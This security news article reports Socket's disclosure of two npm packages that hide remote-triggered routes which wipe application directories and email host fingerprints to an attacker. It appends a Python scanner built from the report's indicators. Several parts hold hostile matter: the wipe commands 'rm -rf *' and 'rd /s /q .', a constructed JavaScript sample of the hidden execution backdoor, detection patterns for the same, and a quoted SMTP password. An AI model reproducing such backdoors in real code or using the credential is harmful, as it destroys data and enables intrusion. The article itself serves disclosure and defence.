
The Socket Threat Research Team has disclosed two dangerous npm packages that masquerade as helpful developer tools—but are in fact remote-controlled data-wiping time bombs. These malicious packages, published by npm user botsailer under the names express-api-sync and system-health-sync-api, embed hidden endpoints capable of executing system-level file deletion commands with a single POST request.
“Both express-api-sync and system-health-sync-api secretly register hidden endpoints that, when triggered with the right credentials, execute file deletion commands that wipe out entire application directories,” Socket warns.
Marketed as a utility to sync databases, express-api-sync is a pure backdoor. It adds inconspicuous Express middleware that quietly registers a route (/api/this/that) on the first HTTP request. This route listens for a hardcoded secret (DEFAULT_123) and, if it is received, immediately executes a destructive shell command:
“Once triggered, the rm -rf * command executes in the application’s working directory, deleting all files, including source code, configuration files, uploaded assets, and any local databases,” the report explains.
What makes it worse:
- It logs nothing.
- It catches errors silently.
- It blends in with normal middleware.
The system-health-sync-api package is a full-fledged espionage and destruction toolkit. This package includes:
- Legitimate dependencies (nodemailer, performance-now)
- Fake health monitoring APIs
- Working endpoints to appear useful
- Cross-platform deletion logic for both Windows (rd /s /q .) and Unix (rm -rf *)
Before wiping anything, it fingerprints the system:
- Hostname
- IP address
- Working directory
- Process ID
- Hash of environment variables
“The environment variables hash is particularly concerning… it creates a unique fingerprint that could help attackers identify servers with specific configurations,” the report notes.
The malware communicates through email using poorly obfuscated hardcoded SMTP credentials. It connects to smtp.hostinger.com and sends alerts to anupm019@gmail[.]com, including:
- Backend URL
- Server status
- Environment fingerprints
“Using SMTP for data exfiltration is clever since most firewalls allow outbound email traffic, and it blends in with legitimate application emails.”
Even the SMTP password, Rebel@shree1, was hidden behind nothing more than base64 encoding.
To ensure the backdoor works no matter the setup:
- It auto-detects frameworks: Express, Fastify, or raw Node.js
- It creates three endpoints: /system/health, /sys/maintenance, and a standard GET health check
- It even provides hints in HTTP error messages to guide misuse
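The report above names the traits a defender can look for in an installed dependency: a wipe command next to shell execution, a route registered lazily from inside a middleware body, and credentials wrapped in base64. The following is an added example, not code from Socket or from either package: a small heuristic scanner that flags files combining those traits and decodes base64 literals so hidden strings become readable. SAMPLE_MALICIOUS is a constructed input written for this example, and the placeholder secret and decoded string in it are assumptions, not values from the report.

```python
import base64, binascii, re
# Indicators from the report: Unix/Windows wipe commands, shell execution, route registration, base64 literals.
PATTERNS = {
    "wipe_command": re.compile(r"rm\s+-rf\s+\*|rd\s+/s\s+/q\s+\."),
    "shell_exec": re.compile(r"child_process|\bexec(?:Sync)?\s*\("),
    "route_reg": re.compile(r"\.(?:get|post|all)\s*\(\s*['\"]/"),
}
B64_LITERAL = re.compile(r"Buffer\.from\(\s*['\"]([A-Za-z0-9+/=]{8,})['\"]\s*,\s*['\"]base64")
USE_CALL = re.compile(r"\.use\s*\(")

def _balanced_arg(src, open_idx):
    """Text between the '(' at open_idx and its matching ')'."""
    depth = 0
    for i in range(open_idx, len(src)):
        depth += {"(": 1, ")": -1}.get(src[i], 0)
        if depth == 0:
            return src[open_idx + 1:i]
    return src[open_idx + 1:]

def _route_inside_middleware(src):
    """Route registered inside a .use() body: the lazy first-request trick, unseen by a startup route listing."""
    return any(PATTERNS["route_reg"].search(_balanced_arg(src, m.end() - 1))
               for m in USE_CALL.finditer(src))

def _decode(b64):
    """Decode a base64 literal so a hidden credential becomes readable, else None."""
    try:
        return base64.b64decode(b64, validate=True).decode()
    except (binascii.Error, UnicodeDecodeError):
        return None

def scan_source(src):
    """Verdicts for one file; run it over every .js under node_modules."""
    hits = {name: bool(p.search(src)) for name, p in PATTERNS.items()}
    decoded = [d for d in map(_decode, B64_LITERAL.findall(src)) if d]
    verdicts = []
    if hits["wipe_command"] and hits["shell_exec"]:
        verdicts.append("remote-wipe")
    if _route_inside_middleware(src):
        verdicts.append("hidden-endpoint")
    if decoded:
        verdicts.append("base64-hidden-literal")
    return {"verdicts": verdicts, "decoded_literals": decoded}

# Constructed sample mimicking the behaviour described above (not the real package code).
SAMPLE_MALICIOUS = """const { exec } = require('child_process');
const pass = Buffer.from('%s', 'base64').toString();
module.exports = (app) => app.use((req, res, next) => {
  app.post('/api/this/that', (q, s) => { if (q.headers['x-secret'] === 'SECRET_PLACEHOLDER') exec('rm -rf *'); });
  next();
});""" % base64.b64encode(b"not-a-real-secret").decode()
```

A route registered only on the first request never appears in a route listing taken at startup, so static inspection of the installed source, as done here, is the check that catches it.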
Developers who installed either package may have unknowingly handed attackers:
- Their infrastructure fingerprints
- A trigger for remote system deletion
- Backdoor access via standard HTTP routes
Socket’s team warned that the packages implement backdoors designed to destroy production systems.